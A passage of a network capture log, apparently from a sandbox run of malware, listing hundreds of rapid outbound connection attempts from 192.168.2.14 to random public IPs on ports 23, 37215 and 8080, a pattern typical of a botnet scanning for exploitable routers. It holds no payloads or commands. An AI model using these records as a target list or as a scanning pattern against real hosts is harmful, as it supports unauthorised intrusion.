                                              Nov 23, 2023 05:14:51.005795956 CET4782823192.168.2.1441.58.152.97
                                              Nov 23, 2023 05:14:51.005803108 CET4782823192.168.2.14142.235.37.78
                                              Nov 23, 2023 05:14:51.005808115 CET4782823192.168.2.14104.14.41.202
                                              Nov 23, 2023 05:14:51.005810976 CET4782823192.168.2.14179.100.82.13
                                              Nov 23, 2023 05:14:51.005814075 CET4782823192.168.2.14217.244.29.35
                                              Nov 23, 2023 05:14:51.005814075 CET4782823192.168.2.14247.97.190.171
                                              Nov 23, 2023 05:14:51.005815983 CET4782823192.168.2.14110.0.188.193
                                              Nov 23, 2023 05:14:51.005816936 CET4782823192.168.2.14100.185.121.243
                                              Nov 23, 2023 05:14:51.005837917 CET4782823192.168.2.144.38.237.34
                                              Nov 23, 2023 05:14:51.005842924 CET4782823192.168.2.14244.81.181.102
                                              Nov 23, 2023 05:14:51.005847931 CET4782823192.168.2.14203.41.123.253
                                              Nov 23, 2023 05:14:51.005855083 CET4782823192.168.2.1475.53.238.123
                                              Nov 23, 2023 05:14:51.005855083 CET4782823192.168.2.14201.250.28.147
                                              Nov 23, 2023 05:14:51.005865097 CET4782823192.168.2.14136.47.159.110
                                              Nov 23, 2023 05:14:51.005867004 CET4782823192.168.2.14151.45.151.50
                                              Nov 23, 2023 05:14:51.005877018 CET4782823192.168.2.1495.9.134.44
                                              Nov 23, 2023 05:14:51.005881071 CET4782823192.168.2.14244.158.211.254
                                              Nov 23, 2023 05:14:51.005892992 CET4782823192.168.2.14208.181.187.238
                                              Nov 23, 2023 05:14:51.005894899 CET4782823192.168.2.14241.29.198.230
                                              Nov 23, 2023 05:14:51.005914927 CET4782823192.168.2.14240.34.210.41
                                              Nov 23, 2023 05:14:51.005914927 CET4782823192.168.2.14244.243.49.161
                                              Nov 23, 2023 05:14:51.005919933 CET4782823192.168.2.14106.225.185.43
                                              Nov 23, 2023 05:14:51.005929947 CET4782823192.168.2.141.78.196.166
                                              Nov 23, 2023 05:14:51.005934000 CET4782823192.168.2.14248.252.44.232
                                              Nov 23, 2023 05:14:51.005934000 CET4782823192.168.2.14158.255.157.242
                                              Nov 23, 2023 05:14:51.005934000 CET4782823192.168.2.1460.101.219.171
                                              Nov 23, 2023 05:14:51.005948067 CET4782823192.168.2.1417.217.72.93
                                              Nov 23, 2023 05:14:51.005949020 CET4782823192.168.2.1438.89.132.161
                                              Nov 23, 2023 05:14:51.005950928 CET4782823192.168.2.1437.142.197.62
                                              Nov 23, 2023 05:14:51.005958080 CET4782823192.168.2.14171.123.230.100
                                              Nov 23, 2023 05:14:51.005965948 CET4782823192.168.2.1473.240.191.161
                                              Nov 23, 2023 05:14:51.005980015 CET4782823192.168.2.14168.167.239.187
                                              Nov 23, 2023 05:14:51.005985022 CET4782823192.168.2.1435.50.91.8
                                              Nov 23, 2023 05:14:51.005995989 CET4782823192.168.2.141.49.236.68
                                              Nov 23, 2023 05:14:51.005996943 CET4782823192.168.2.14160.127.207.56
                                              Nov 23, 2023 05:14:51.005996943 CET4782823192.168.2.1494.40.87.177
                                              Nov 23, 2023 05:14:51.005996943 CET4782823192.168.2.14219.233.215.191
                                              Nov 23, 2023 05:14:51.006006956 CET4782823192.168.2.14104.190.238.89
                                              Nov 23, 2023 05:14:51.006010056 CET4782823192.168.2.14160.170.7.191
                                              Nov 23, 2023 05:14:51.006025076 CET4782823192.168.2.14200.178.77.114
                                              Nov 23, 2023 05:14:51.006025076 CET4782823192.168.2.14254.52.173.17
                                              Nov 23, 2023 05:14:51.006025076 CET4782823192.168.2.1431.142.85.108
                                              Nov 23, 2023 05:14:51.006043911 CET4782823192.168.2.14159.41.242.27
                                              Nov 23, 2023 05:14:51.006045103 CET4782823192.168.2.14196.38.33.115
                                              Nov 23, 2023 05:14:51.006045103 CET4782823192.168.2.1417.124.20.245
                                              Nov 23, 2023 05:14:51.006047010 CET4782823192.168.2.1437.152.83.241
                                              Nov 23, 2023 05:14:51.006059885 CET4782823192.168.2.1485.156.195.227
                                              Nov 23, 2023 05:14:51.006062984 CET4782823192.168.2.14245.87.135.165
                                              Nov 23, 2023 05:14:51.006062984 CET4782823192.168.2.14189.136.137.140
                                              Nov 23, 2023 05:14:51.006077051 CET4782823192.168.2.14174.65.62.24
                                              Nov 23, 2023 05:14:51.006077051 CET4782823192.168.2.1442.44.230.188
                                              Nov 23, 2023 05:14:51.006083012 CET4782823192.168.2.14164.154.241.247
                                              Nov 23, 2023 05:14:51.006099939 CET4782823192.168.2.14243.160.25.124
                                              Nov 23, 2023 05:14:51.006103992 CET4782823192.168.2.14107.130.93.38
                                              Nov 23, 2023 05:14:51.006120920 CET4782823192.168.2.1499.18.53.91
                                              Nov 23, 2023 05:14:51.006139040 CET4782823192.168.2.14173.207.91.147
                                              Nov 23, 2023 05:14:51.006139040 CET4782823192.168.2.1453.194.5.125
                                              Nov 23, 2023 05:14:51.006150961 CET4782823192.168.2.14126.99.2.235
                                              Nov 23, 2023 05:14:51.006155014 CET4782823192.168.2.14204.127.228.181
                                              Nov 23, 2023 05:14:51.006160975 CET4782823192.168.2.14128.10.48.164
                                              Nov 23, 2023 05:14:51.006170988 CET4782823192.168.2.14162.181.21.56
                                              Nov 23, 2023 05:14:51.006182909 CET4782823192.168.2.14176.22.57.124
                                              Nov 23, 2023 05:14:51.006182909 CET4782823192.168.2.14192.153.142.183
                                              Nov 23, 2023 05:14:51.006182909 CET4782823192.168.2.14246.189.1.23
                                              Nov 23, 2023 05:14:51.006200075 CET4782823192.168.2.14170.157.192.233
                                              Nov 23, 2023 05:14:51.006216049 CET4782823192.168.2.14118.104.138.93
                                              Nov 23, 2023 05:14:51.006217003 CET4782823192.168.2.14240.193.203.34
                                              Nov 23, 2023 05:14:51.006222010 CET4782823192.168.2.1453.13.171.44
                                              Nov 23, 2023 05:14:51.006231070 CET4782823192.168.2.1431.61.45.148
                                              Nov 23, 2023 05:14:51.006233931 CET4782823192.168.2.14172.80.115.162
                                              Nov 23, 2023 05:14:51.006242037 CET4782823192.168.2.1427.218.183.107
                                              Nov 23, 2023 05:14:51.006247997 CET4782823192.168.2.1489.54.11.68
                                              Nov 23, 2023 05:14:51.006247997 CET4782823192.168.2.1434.127.88.22
                                              Nov 23, 2023 05:14:51.006259918 CET4782823192.168.2.14189.173.61.194
                                              Nov 23, 2023 05:14:51.006263971 CET4782823192.168.2.145.92.117.76
                                              Nov 23, 2023 05:14:51.006278038 CET4782823192.168.2.14198.220.224.0
                                              Nov 23, 2023 05:14:51.006279945 CET4782823192.168.2.14114.230.187.215
                                              Nov 23, 2023 05:14:51.006279945 CET4782823192.168.2.14173.228.12.115
                                              Nov 23, 2023 05:14:51.006283998 CET4782823192.168.2.14200.146.92.174
                                              Nov 23, 2023 05:14:51.006287098 CET4782823192.168.2.14153.110.114.87
                                              Nov 23, 2023 05:14:51.006299019 CET4782823192.168.2.1432.105.138.86
                                              Nov 23, 2023 05:14:51.006299019 CET4782823192.168.2.14167.68.122.22
                                              Nov 23, 2023 05:14:51.006316900 CET4782823192.168.2.1498.136.129.242
                                              Nov 23, 2023 05:14:51.006316900 CET4782823192.168.2.1495.128.112.88
                                              Nov 23, 2023 05:14:51.006328106 CET4782823192.168.2.14154.208.44.229
                                              Nov 23, 2023 05:14:51.006341934 CET4782823192.168.2.14173.96.42.111
                                              Nov 23, 2023 05:14:51.006356001 CET4782823192.168.2.1484.26.198.115
                                              Nov 23, 2023 05:14:51.006359100 CET4782823192.168.2.1418.226.103.1
                                              Nov 23, 2023 05:14:51.006362915 CET4782823192.168.2.14185.224.38.223
                                              Nov 23, 2023 05:14:51.010862112 CET4783037215192.168.2.14156.149.80.99
                                              Nov 23, 2023 05:14:51.010862112 CET4783037215192.168.2.14197.68.192.144
                                              Nov 23, 2023 05:14:51.010869980 CET4783037215192.168.2.14197.17.46.157
                                              Nov 23, 2023 05:14:51.010869980 CET4783037215192.168.2.1441.135.4.27
                                              Nov 23, 2023 05:14:51.010885000 CET4783037215192.168.2.14156.231.204.0
                                              Nov 23, 2023 05:14:51.010890007 CET4783037215192.168.2.1441.8.204.251
                                              Nov 23, 2023 05:14:51.010893106 CET4783037215192.168.2.1441.179.240.224
                                              Nov 23, 2023 05:14:51.010893106 CET4783037215192.168.2.14197.117.13.232
                                              Nov 23, 2023 05:14:51.010900974 CET4783037215192.168.2.14156.185.196.213
                                              Nov 23, 2023 05:14:51.010910034 CET4783037215192.168.2.1441.139.248.54
                                              Nov 23, 2023 05:14:51.010917902 CET4783037215192.168.2.1441.76.147.24
                                              Nov 23, 2023 05:14:51.010920048 CET4783037215192.168.2.14156.213.246.154
                                              Nov 23, 2023 05:14:51.010932922 CET4783037215192.168.2.14156.108.26.149
                                              Nov 23, 2023 05:14:51.010935068 CET4783037215192.168.2.14197.197.242.138
                                              Nov 23, 2023 05:14:51.010943890 CET4783037215192.168.2.14156.196.53.110
                                              Nov 23, 2023 05:14:51.010957003 CET4783037215192.168.2.1441.130.174.9
                                              Nov 23, 2023 05:14:51.010961056 CET4783037215192.168.2.14156.61.63.38
                                              Nov 23, 2023 05:14:51.010966063 CET4783037215192.168.2.14156.139.235.210
                                              Nov 23, 2023 05:14:51.010977030 CET4783037215192.168.2.1441.8.169.138
                                              Nov 23, 2023 05:14:51.010983944 CET4783037215192.168.2.1441.66.46.10
                                              Nov 23, 2023 05:14:51.010983944 CET4783037215192.168.2.1441.22.95.83
                                              Nov 23, 2023 05:14:51.010994911 CET4783037215192.168.2.14156.77.151.104
                                              Nov 23, 2023 05:14:51.011002064 CET4783037215192.168.2.14156.124.76.90
                                              Nov 23, 2023 05:14:51.011007071 CET4783037215192.168.2.14156.44.173.0
                                              Nov 23, 2023 05:14:51.011008024 CET4783037215192.168.2.14156.71.228.119
                                              Nov 23, 2023 05:14:51.011018991 CET4783037215192.168.2.1441.80.181.51
                                              Nov 23, 2023 05:14:51.011018991 CET4783037215192.168.2.14156.127.17.116
                                              Nov 23, 2023 05:14:51.011023045 CET4783037215192.168.2.14156.34.215.56
                                              Nov 23, 2023 05:14:51.011029005 CET4783037215192.168.2.14156.6.151.188
                                              Nov 23, 2023 05:14:51.011037111 CET4783037215192.168.2.14156.55.161.113
                                              Nov 23, 2023 05:14:51.011040926 CET4783037215192.168.2.1441.79.128.226
                                              Nov 23, 2023 05:14:51.011044979 CET4783037215192.168.2.14156.176.209.163
                                              Nov 23, 2023 05:14:51.011058092 CET4783037215192.168.2.1441.232.43.34
                                              Nov 23, 2023 05:14:51.011063099 CET4783037215192.168.2.14156.53.81.115
                                              Nov 23, 2023 05:14:51.011063099 CET4783037215192.168.2.14156.152.148.119
                                              Nov 23, 2023 05:14:51.011075974 CET4783037215192.168.2.14197.66.102.183
                                              Nov 23, 2023 05:14:51.011079073 CET4783037215192.168.2.14197.240.248.74
                                              Nov 23, 2023 05:14:51.011095047 CET4783037215192.168.2.1441.134.71.53
                                              Nov 23, 2023 05:14:51.011095047 CET4783037215192.168.2.1441.186.189.228
                                              Nov 23, 2023 05:14:51.011106014 CET4783037215192.168.2.1441.103.161.253
                                              Nov 23, 2023 05:14:51.011113882 CET4783037215192.168.2.1441.120.156.173
                                              Nov 23, 2023 05:14:51.011115074 CET4783037215192.168.2.1441.48.141.45
                                              Nov 23, 2023 05:14:51.011116982 CET4783037215192.168.2.14156.48.162.192
                                              Nov 23, 2023 05:14:51.011121988 CET4783037215192.168.2.14197.131.76.21
                                              Nov 23, 2023 05:14:51.011126995 CET4783037215192.168.2.14156.196.238.126
                                              Nov 23, 2023 05:14:51.011132002 CET4783037215192.168.2.14197.135.146.121
                                              Nov 23, 2023 05:14:51.011132956 CET4783037215192.168.2.14156.183.183.176
                                              Nov 23, 2023 05:14:51.011146069 CET4783037215192.168.2.14156.110.216.36
                                              Nov 23, 2023 05:14:51.011152029 CET4783037215192.168.2.14197.110.132.56
                                              Nov 23, 2023 05:14:51.011152983 CET4783037215192.168.2.1441.244.196.218
                                              Nov 23, 2023 05:14:51.011169910 CET4783037215192.168.2.14197.142.2.136
                                              Nov 23, 2023 05:14:51.011169910 CET4783037215192.168.2.14156.230.218.13
                                              Nov 23, 2023 05:14:51.011178970 CET4783037215192.168.2.14197.182.85.219
                                              Nov 23, 2023 05:14:51.011179924 CET4783037215192.168.2.14156.93.143.217
                                              Nov 23, 2023 05:14:51.011179924 CET4783037215192.168.2.1441.207.45.27
                                              Nov 23, 2023 05:14:51.011181116 CET4783037215192.168.2.14197.179.100.131
                                              Nov 23, 2023 05:14:51.011193037 CET4783037215192.168.2.14156.192.193.129
                                              Nov 23, 2023 05:14:51.011200905 CET4783037215192.168.2.14156.228.57.108
                                              Nov 23, 2023 05:14:51.011210918 CET4783037215192.168.2.1441.234.175.19
                                              Nov 23, 2023 05:14:51.011219025 CET4783037215192.168.2.14197.60.159.24
                                              Nov 23, 2023 05:14:51.011223078 CET4783037215192.168.2.14197.165.227.4
                                              Nov 23, 2023 05:14:51.011225939 CET4783037215192.168.2.14197.176.249.115
                                              Nov 23, 2023 05:14:51.011229992 CET4783037215192.168.2.1441.240.153.182
                                              Nov 23, 2023 05:14:51.011244059 CET4783037215192.168.2.14197.48.159.180
                                              Nov 23, 2023 05:14:51.011244059 CET4783037215192.168.2.14156.61.157.62
                                              Nov 23, 2023 05:14:51.011251926 CET4783037215192.168.2.14197.165.29.175
                                              Nov 23, 2023 05:14:51.011257887 CET4783037215192.168.2.1441.76.75.220
                                              Nov 23, 2023 05:14:51.011265039 CET4783037215192.168.2.1441.119.222.26
                                              Nov 23, 2023 05:14:51.011267900 CET4783037215192.168.2.14156.238.51.239
                                              Nov 23, 2023 05:14:51.011279106 CET4783037215192.168.2.14156.76.231.0
                                              Nov 23, 2023 05:14:51.011286974 CET4783037215192.168.2.1441.23.116.201
                                              Nov 23, 2023 05:14:51.011291027 CET4783037215192.168.2.14197.62.72.85
                                              Nov 23, 2023 05:14:51.011300087 CET4783037215192.168.2.1441.162.28.73
                                              Nov 23, 2023 05:14:51.011300087 CET4783037215192.168.2.14156.83.0.170
                                              Nov 23, 2023 05:14:51.011307955 CET4783037215192.168.2.1441.238.213.92
                                              Nov 23, 2023 05:14:51.011316061 CET4783037215192.168.2.1441.255.246.95
                                              Nov 23, 2023 05:14:51.011321068 CET4783037215192.168.2.1441.242.219.195
                                              Nov 23, 2023 05:14:51.011321068 CET4783037215192.168.2.14156.116.78.18
                                              Nov 23, 2023 05:14:51.011332035 CET4783037215192.168.2.14156.182.87.56
                                              Nov 23, 2023 05:14:51.011337042 CET4783037215192.168.2.14197.28.224.141
                                              Nov 23, 2023 05:14:51.011348009 CET4783037215192.168.2.14197.47.6.112
                                              Nov 23, 2023 05:14:51.011352062 CET4783037215192.168.2.14197.231.107.72
                                              Nov 23, 2023 05:14:51.011358023 CET4783037215192.168.2.14197.120.166.223
                                              Nov 23, 2023 05:14:51.011362076 CET4783037215192.168.2.14197.251.43.11
                                              Nov 23, 2023 05:14:51.011362076 CET4783037215192.168.2.1441.75.120.128
                                              Nov 23, 2023 05:14:51.011374950 CET4783037215192.168.2.14156.87.53.186
                                              Nov 23, 2023 05:14:51.011382103 CET4783037215192.168.2.14156.114.156.10
                                              Nov 23, 2023 05:14:51.011392117 CET4783037215192.168.2.14197.27.254.83
                                              Nov 23, 2023 05:14:51.011394024 CET4783037215192.168.2.14197.165.223.25
                                              Nov 23, 2023 05:14:51.011411905 CET4783037215192.168.2.1441.139.237.196
                                              Nov 23, 2023 05:14:51.011419058 CET4783037215192.168.2.14156.110.17.42
                                              Nov 23, 2023 05:14:51.011420012 CET4783037215192.168.2.14197.69.223.128
                                              Nov 23, 2023 05:14:51.011434078 CET4783037215192.168.2.1441.173.127.67
                                              Nov 23, 2023 05:14:51.011434078 CET4783037215192.168.2.1441.59.74.116
                                              Nov 23, 2023 05:14:51.011435986 CET4783037215192.168.2.14156.157.50.242
                                              Nov 23, 2023 05:14:51.011451006 CET4783037215192.168.2.14156.166.10.84
                                              Nov 23, 2023 05:14:51.011451960 CET4783037215192.168.2.14197.63.79.185
                                              Nov 23, 2023 05:14:51.011476994 CET4783037215192.168.2.1441.164.185.29
                                              Nov 23, 2023 05:14:51.011476994 CET4783037215192.168.2.1441.174.209.159
                                              Nov 23, 2023 05:14:51.011482954 CET4783037215192.168.2.1441.195.247.31
                                              Nov 23, 2023 05:14:51.011490107 CET4783037215192.168.2.14156.1.21.167
                                              Nov 23, 2023 05:14:51.011496067 CET4783037215192.168.2.14197.111.167.13
                                              Nov 23, 2023 05:14:51.011499882 CET4783037215192.168.2.14197.227.97.52
                                              Nov 23, 2023 05:14:51.011511087 CET4783037215192.168.2.14156.153.53.207
                                              Nov 23, 2023 05:14:51.011513948 CET4783037215192.168.2.14156.95.148.89
                                              Nov 23, 2023 05:14:51.011526108 CET4783037215192.168.2.14197.192.174.79
                                              Nov 23, 2023 05:14:51.011526108 CET4783037215192.168.2.14156.248.91.134
                                              Nov 23, 2023 05:14:51.011532068 CET4783037215192.168.2.14156.113.55.207
                                              Nov 23, 2023 05:14:51.011544943 CET4783037215192.168.2.14197.177.140.66
                                              Nov 23, 2023 05:14:51.011545897 CET4783037215192.168.2.14156.142.235.70
                                              Nov 23, 2023 05:14:51.011554003 CET4783037215192.168.2.1441.213.68.44
                                              Nov 23, 2023 05:14:51.011558056 CET4783037215192.168.2.14197.88.224.4
                                              Nov 23, 2023 05:14:51.011564970 CET4783037215192.168.2.1441.208.105.37
                                              Nov 23, 2023 05:14:51.011571884 CET4783037215192.168.2.14156.164.190.56
                                              Nov 23, 2023 05:14:51.011579037 CET4783037215192.168.2.1441.67.177.115
                                              Nov 23, 2023 05:14:51.011579037 CET4783037215192.168.2.14197.148.98.91
                                              Nov 23, 2023 05:14:51.011581898 CET4783037215192.168.2.14156.98.126.251
                                              Nov 23, 2023 05:14:51.011585951 CET4783037215192.168.2.14197.85.249.254
                                              Nov 23, 2023 05:14:51.011593103 CET4783037215192.168.2.14156.24.23.197
                                              Nov 23, 2023 05:14:51.011601925 CET4783037215192.168.2.14156.181.144.210
                                              Nov 23, 2023 05:14:51.011609077 CET4783037215192.168.2.14197.32.140.172
                                              Nov 23, 2023 05:14:51.011619091 CET4783037215192.168.2.14197.169.103.129
                                              Nov 23, 2023 05:14:51.011629105 CET4783037215192.168.2.14197.159.29.138
                                              Nov 23, 2023 05:14:51.011629105 CET4783037215192.168.2.14197.28.177.4
                                              Nov 23, 2023 05:14:51.011642933 CET4783037215192.168.2.1441.190.113.24
                                              Nov 23, 2023 05:14:51.011645079 CET4783037215192.168.2.14197.95.219.179
                                              Nov 23, 2023 05:14:51.011655092 CET4783037215192.168.2.14197.247.53.175
                                              Nov 23, 2023 05:14:51.011671066 CET4783037215192.168.2.14197.182.40.201
                                              Nov 23, 2023 05:14:51.011673927 CET4783037215192.168.2.14197.44.53.59
                                              Nov 23, 2023 05:14:51.011673927 CET4783037215192.168.2.14156.205.29.207
                                              Nov 23, 2023 05:14:51.011677980 CET4783037215192.168.2.14197.205.23.167
                                              Nov 23, 2023 05:14:51.011693954 CET4783037215192.168.2.14197.40.186.208
                                              Nov 23, 2023 05:14:51.011693954 CET4783037215192.168.2.14156.128.0.89
                                              Nov 23, 2023 05:14:51.011697054 CET4783037215192.168.2.1441.176.149.98
                                              Nov 23, 2023 05:14:51.011708975 CET4783037215192.168.2.1441.235.123.195
                                              Nov 23, 2023 05:14:51.011714935 CET4783037215192.168.2.14197.3.45.9
                                              Nov 23, 2023 05:14:51.011719942 CET4783037215192.168.2.1441.84.155.142
                                              Nov 23, 2023 05:14:51.011720896 CET4783037215192.168.2.14156.178.112.129
                                              Nov 23, 2023 05:14:51.011729002 CET4783037215192.168.2.1441.123.60.186
                                              Nov 23, 2023 05:14:51.011737108 CET4783037215192.168.2.1441.88.187.150
                                              Nov 23, 2023 05:14:51.011743069 CET4783037215192.168.2.14197.128.146.165
                                              Nov 23, 2023 05:14:51.011748075 CET4783037215192.168.2.1441.231.107.187
                                              Nov 23, 2023 05:14:51.011760950 CET4783037215192.168.2.14197.117.31.80
                                              Nov 23, 2023 05:14:51.011760950 CET4783037215192.168.2.14197.160.250.84
                                              Nov 23, 2023 05:14:51.011760950 CET4783037215192.168.2.14156.14.6.190
                                              Nov 23, 2023 05:14:51.011760950 CET4783037215192.168.2.1441.176.227.242
                                              Nov 23, 2023 05:14:51.011763096 CET4783037215192.168.2.14197.235.202.48
                                              Nov 23, 2023 05:14:51.011769056 CET4783037215192.168.2.1441.17.208.156
                                              Nov 23, 2023 05:14:51.011769056 CET4783037215192.168.2.14156.35.105.111
                                              Nov 23, 2023 05:14:51.011781931 CET4783037215192.168.2.1441.213.36.144
                                              Nov 23, 2023 05:14:51.011781931 CET4783037215192.168.2.1441.159.254.175
                                              Nov 23, 2023 05:14:51.011786938 CET4783037215192.168.2.1441.132.117.86
                                              Nov 23, 2023 05:14:51.011795998 CET4783037215192.168.2.14197.100.225.235
                                              Nov 23, 2023 05:14:51.011800051 CET4783037215192.168.2.14197.43.234.31
                                              Nov 23, 2023 05:14:51.011818886 CET4783037215192.168.2.14197.210.188.181
                                              Nov 23, 2023 05:14:51.011820078 CET4783037215192.168.2.14156.225.76.194
                                              Nov 23, 2023 05:14:51.011826038 CET4783037215192.168.2.14197.142.190.31
                                              Nov 23, 2023 05:14:51.011840105 CET4783037215192.168.2.14156.41.66.71
                                              Nov 23, 2023 05:14:51.011841059 CET4783037215192.168.2.1441.82.118.197
                                              Nov 23, 2023 05:14:51.011850119 CET4783037215192.168.2.14197.172.58.32
                                              Nov 23, 2023 05:14:51.012057066 CET4422637215192.168.2.14156.235.103.206
                                              Nov 23, 2023 05:14:51.012131929 CET5955437215192.168.2.1441.78.156.233
                                              Nov 23, 2023 05:14:51.012146950 CET3565237215192.168.2.14156.254.88.148
                                              Nov 23, 2023 05:14:51.012161970 CET4239037215192.168.2.14156.226.15.209
                                              Nov 23, 2023 05:14:51.017577887 CET4562423192.168.2.1495.181.105.1
                                              Nov 23, 2023 05:14:51.040580034 CET478168080192.168.2.1494.188.27.71
                                              Nov 23, 2023 05:14:51.040582895 CET478168080192.168.2.1462.160.90.58
                                              Nov 23, 2023 05:14:51.040591955 CET478168080192.168.2.1494.6.129.196
                                              Nov 23, 2023 05:14:51.040605068 CET478168080192.168.2.1495.152.23.180
                                              Nov 23, 2023 05:14:51.040606976 CET478168080192.168.2.1495.41.113.152
                                              Nov 23, 2023 05:14:51.040617943 CET478168080192.168.2.1494.254.69.7
                                              Nov 23, 2023 05:14:51.040617943 CET478168080192.168.2.1494.10.249.131
                                              Nov 23, 2023 05:14:51.040617943 CET478168080192.168.2.1462.223.163.64
                                              Nov 23, 2023 05:14:51.040628910 CET478168080192.168.2.1431.85.113.249
                                              Nov 23, 2023 05:14:51.040631056 CET478168080192.168.2.1431.84.76.67
                                              Nov 23, 2023 05:14:51.040633917 CET478168080192.168.2.1462.50.81.78
                                              Nov 23, 2023 05:14:51.040638924 CET478168080192.168.2.1495.43.193.50
                                              Nov 23, 2023 05:14:51.040638924 CET478168080192.168.2.1485.44.184.133
                                              Nov 23, 2023 05:14:51.040673018 CET478168080192.168.2.1494.12.8.242
                                              Nov 23, 2023 05:14:51.040673018 CET478168080192.168.2.1431.202.235.140
                                              Nov 23, 2023 05:14:51.040673018 CET478168080192.168.2.1494.119.232.127
                                              Nov 23, 2023 05:14:51.040674925 CET478168080192.168.2.1485.137.130.218
                                              Nov 23, 2023 05:14:51.040674925 CET478168080192.168.2.1494.111.189.28
                                              Nov 23, 2023 05:14:51.040679932 CET478168080192.168.2.1485.220.196.180
                                              Nov 23, 2023 05:14:51.040679932 CET478168080192.168.2.1495.231.107.161
                                              Nov 23, 2023 05:14:51.040679932 CET478168080192.168.2.1431.128.7.14
                                              Nov 23, 2023 05:14:51.040683031 CET478168080192.168.2.1462.65.55.152
                                              Nov 23, 2023 05:14:51.040690899 CET478168080192.168.2.1485.232.176.155
                                              Nov 23, 2023 05:14:51.040690899 CET478168080192.168.2.1495.77.59.247
                                              Nov 23, 2023 05:14:51.040741920 CET478168080192.168.2.1462.170.177.22
                                              Nov 23, 2023 05:14:51.040741920 CET478168080192.168.2.1495.163.191.147
                                              Nov 23, 2023 05:14:51.040741920 CET478168080192.168.2.1462.214.54.34
                                              Nov 23, 2023 05:14:51.040745020 CET478168080192.168.2.1462.225.245.226
                                              Nov 23, 2023 05:14:51.040745020 CET478168080192.168.2.1494.198.106.84
                                              Nov 23, 2023 05:14:51.040745020 CET478168080192.168.2.1495.48.66.147
                                              Nov 23, 2023 05:14:51.040745020 CET478168080192.168.2.1494.154.224.22
                                              Nov 23, 2023 05:14:51.040745020 CET478168080192.168.2.1494.21.136.152
                                              Nov 23, 2023 05:14:51.040747881 CET478168080192.168.2.1485.194.123.77
                                              Nov 23, 2023 05:14:51.040749073 CET478168080192.168.2.1494.135.168.95
                                              Nov 23, 2023 05:14:51.040750027 CET478168080192.168.2.1485.80.63.132
                                              Nov 23, 2023 05:14:51.040747881 CET478168080192.168.2.1485.56.157.237
                                              Nov 23, 2023 05:14:51.040749073 CET478168080192.168.2.1494.149.101.222
                                              Nov 23, 2023 05:14:51.040747881 CET478168080192.168.2.1485.200.207.44
                                              Nov 23, 2023 05:14:51.040750980 CET478168080192.168.2.1431.173.251.241
                                              Nov 23, 2023 05:14:51.040747881 CET478168080192.168.2.1431.122.62.110
                                              Nov 23, 2023 05:14:51.040750980 CET478168080192.168.2.1494.183.23.88
                                              Nov 23, 2023 05:14:51.040750980 CET478168080192.168.2.1495.16.204.66
                                              Nov 23, 2023 05:14:51.040750980 CET478168080192.168.2.1494.104.167.32
                                              Nov 23, 2023 05:14:51.040750980 CET478168080192.168.2.1495.16.152.167
                                              Nov 23, 2023 05:14:51.040750980 CET478168080192.168.2.1485.109.252.99
                                              Nov 23, 2023 05:14:51.040750980 CET478168080192.168.2.1485.51.114.45
                                              Nov 23, 2023 05:14:51.040750980 CET478168080192.168.2.1431.150.66.109
                                              Nov 23, 2023 05:14:51.040750980 CET478168080192.168.2.1431.36.130.76
                                              Nov 23, 2023 05:14:51.040750980 CET478168080192.168.2.1462.208.182.252
                                              Nov 23, 2023 05:14:51.040823936 CET478168080192.168.2.1494.102.101.164
                                              Nov 23, 2023 05:14:51.040823936 CET478168080192.168.2.1485.57.71.147
                                              Nov 23, 2023 05:14:51.040823936 CET478168080192.168.2.1431.18.62.12
                                              Nov 23, 2023 05:14:51.040828943 CET478168080192.168.2.1462.97.23.78
                                              Nov 23, 2023 05:14:51.040828943 CET478168080192.168.2.1462.202.125.166
                                              Nov 23, 2023 05:14:51.040828943 CET478168080192.168.2.1462.38.112.87
                                              Nov 23, 2023 05:14:51.040829897 CET478168080192.168.2.1495.120.177.30
                                              Nov 23, 2023 05:14:51.040829897 CET478168080192.168.2.1462.47.178.254
                                              Nov 23, 2023 05:14:51.040829897 CET478168080192.168.2.1485.209.50.11
                                              Nov 23, 2023 05:14:51.040829897 CET478168080192.168.2.1494.64.46.7
                                              Nov 23, 2023 05:14:51.040829897 CET478168080192.168.2.1462.255.197.231
                                              Nov 23, 2023 05:14:51.040829897 CET478168080192.168.2.1485.173.213.228
                                              Nov 23, 2023 05:14:51.040832996 CET478168080192.168.2.1494.148.95.7
                                              Nov 23, 2023 05:14:51.040832996 CET478168080192.168.2.1494.144.111.128
                                              Nov 23, 2023 05:14:51.040832996 CET478168080192.168.2.1462.182.158.205
                                              Nov 23, 2023 05:14:51.040832996 CET478168080192.168.2.1431.59.14.206
                                              Nov 23, 2023 05:14:51.040832996 CET478168080192.168.2.1485.219.153.246
                                              Nov 23, 2023 05:14:51.040832996 CET478168080192.168.2.1495.240.194.145
                                              Nov 23, 2023 05:14:51.040832996 CET478168080192.168.2.1485.17.18.161
                                              Nov 23, 2023 05:14:51.040837049 CET478168080192.168.2.1485.23.227.71
                                              Nov 23, 2023 05:14:51.040838957 CET478168080192.168.2.1485.103.221.187
                                              Nov 23, 2023 05:14:51.040832996 CET478168080192.168.2.1494.208.147.148
                                              Nov 23, 2023 05:14:51.040838003 CET478168080192.168.2.1495.59.87.125
                                              Nov 23, 2023 05:14:51.040838957 CET478168080192.168.2.1494.45.86.186
                                              Nov 23, 2023 05:14:51.040838003 CET478168080192.168.2.1495.249.129.118
                                              Nov 23, 2023 05:14:51.040837049 CET478168080192.168.2.1431.221.79.226
                                              Nov 23, 2023 05:14:51.040838003 CET478168080192.168.2.1495.145.144.45
                                              Nov 23, 2023 05:14:51.040837049 CET478168080192.168.2.1485.153.72.192
                                              Nov 23, 2023 05:14:51.040838003 CET478168080192.168.2.1494.247.50.120
                                              Nov 23, 2023 05:14:51.040838957 CET478168080192.168.2.1495.115.20.41
                                              Nov 23, 2023 05:14:51.040837049 CET478168080192.168.2.1431.100.198.82
                                              Nov 23, 2023 05:14:51.040838957 CET478168080192.168.2.1495.167.30.202
                                              Nov 23, 2023 05:14:51.040838957 CET478168080192.168.2.1431.131.37.101
                                              Nov 23, 2023 05:14:51.040837049 CET478168080192.168.2.1495.69.137.53
                                              Nov 23, 2023 05:14:51.040838957 CET478168080192.168.2.1431.32.171.240
                                              Nov 23, 2023 05:14:51.040837049 CET478168080192.168.2.1431.121.222.204
                                              Nov 23, 2023 05:14:51.040838957 CET478168080192.168.2.1462.221.18.101
                                              Nov 23, 2023 05:14:51.040837049 CET478168080192.168.2.1431.25.173.98
                                              Nov 23, 2023 05:14:51.040838957 CET478168080192.168.2.1431.17.69.41
                                              Nov 23, 2023 05:14:51.040837049 CET478168080192.168.2.1462.199.169.130
                                              Nov 23, 2023 05:14:51.040894985 CET478168080192.168.2.1494.172.191.239
                                              Nov 23, 2023 05:14:51.040894985 CET478168080192.168.2.1462.196.40.164
